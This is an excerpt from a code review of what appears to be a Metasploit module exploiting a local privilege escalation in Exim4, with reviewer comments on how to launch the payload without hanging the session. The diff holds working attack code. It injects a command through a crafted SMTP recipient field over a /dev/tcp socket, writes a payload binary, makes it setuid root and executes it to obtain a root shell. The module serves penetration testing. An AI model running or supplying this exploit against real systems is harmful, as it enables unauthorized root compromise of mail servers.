modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb

```diff
@@ -0,0 +1,189 @@
+      socket.gets
+      socket.puts("data\n")
+      socket.gets
+      for i in (1..31)
+        socket.puts("Received: #{i}\n")
+      end
+      socket.puts(".\n")
+      socket.gets
+      socket.puts("quit\n")
+      socket.close
+      socket_subsystem.shutdown
+    else
+      res = cmd_exec("exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}")
+
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec('echo "helo localhost" >&3')
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec('echo "mail from:<>" >&3')
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec("echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3")
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec('echo "data" >&3')
+      cmd_exec('read -u 3 && echo $REPLY')
+      for i in (1..31)
+        cmd_exec("echo 'Received: #{i}' >&3")
+      end
+      cmd_exec('echo "." >&3')
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec('echo "quit" >&3')
+      cmd_exec('read -u 3 && echo $REPLY')
+      cmd_exec('exec 3<&-')
+    end
+
+    print_status('Payload sent, wait a few seconds...')
+    Rex.sleep(5)
+  end
+
+  def on_new_session(session)
+    super
+
+    if session.type == 'meterpreter'
+      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
+      session.fs.file.rm(@payload_path)
+    else
+      session.shell_command_token("rm -f #{@payload_path}")
+    end
+
+    print_good("Check session #{session.name}, you should have a root shell!")
+  end
+
+  def check
+    exim = datastore['EXIMPATH'] ? datastore['EXIMPATH'] : 'exim'
+
+    res = cmd_exec("#{exim} -bV")
+    if res =~ /Exim version ([0-9\.]*) /i # Maybe improve the regex
+      version = Gem::Version.new($1)
+      vprint_status("Detected running exim version: #{version}")
+      if version >= target[:lower_version] && version <= target[:upper_version]
+        return CheckCode::Appears
+      else
+        return CheckCode::Safe
+      end
+    end
+
+    print_error('Couldn\'t retrieve exim version. You may want to set EXIMPATH.')
+    CheckCode::Unknown
+  end
+
+  def exploit
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
+      end
+    end
+
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    unless datastore['PrependSetuid'] && datastore['PrependSetgid']
+      fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \
+                                    'to get root privileges.')
+    end
+
+    @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
+    write_file(@payload_path, payload.encoded_exe)
+    inject_payload(encode_command("/bin/bash -c \"chown root #{@payload_path};"\
+                                  "chmod 4755 #{@payload_path}\""))
+    if setuid?(@payload_path)
+      cmd_exec(@payload_path)
```

Comment:
This will likely hang the existing session until the new session ends. I offer two solutions:

```suggestion
      cmd_exec("echo #{@payload_path} | sh")
```

```suggestion
      cmd_exec("#{@payload_path & echo ")
```

Reply:
Well spotted, just a little question though : on the second solution, is the echo really needed? Isn't the & enough to run the process in the background?

Reply:
> on the second solution, is the echo really needed? Isn't the & enough to run the process in the background?

Unfortunately, yes. On some old Linux systems, for reasons that I never bothered to explore, failure to append ` echo ` caused the session to die. On one hand, it's unlikely that an old Linux system would be running a vulnerable version of Exim4. On the other hand, there `echo` should cause no harm.

Reply:
Ok, good to know!